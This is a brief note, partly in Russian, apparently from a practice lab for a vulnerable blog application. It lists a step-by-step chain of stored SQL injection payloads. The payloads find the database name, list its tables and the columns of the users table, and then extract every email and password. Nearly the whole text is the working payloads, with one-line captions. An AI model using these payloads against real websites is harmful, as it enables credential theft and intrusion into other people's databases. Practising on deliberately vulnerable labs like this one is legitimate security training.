SQL Injection - Stored (Blog)

(low)

Payload’ы подряд:

1', (select database() ))-- -

Название базы данных

1', (select group_concat(table_name)from information_schema.tables where table_schema=database()))-- -

Название таблицы

1', (select group_concat(column_name)from information_schema.columns where table_name='users'))-- -

Смотрим таблицу users

1', (select group_concat(email,password) from users))-- -

Смотрим пароли и логины из этой таблицы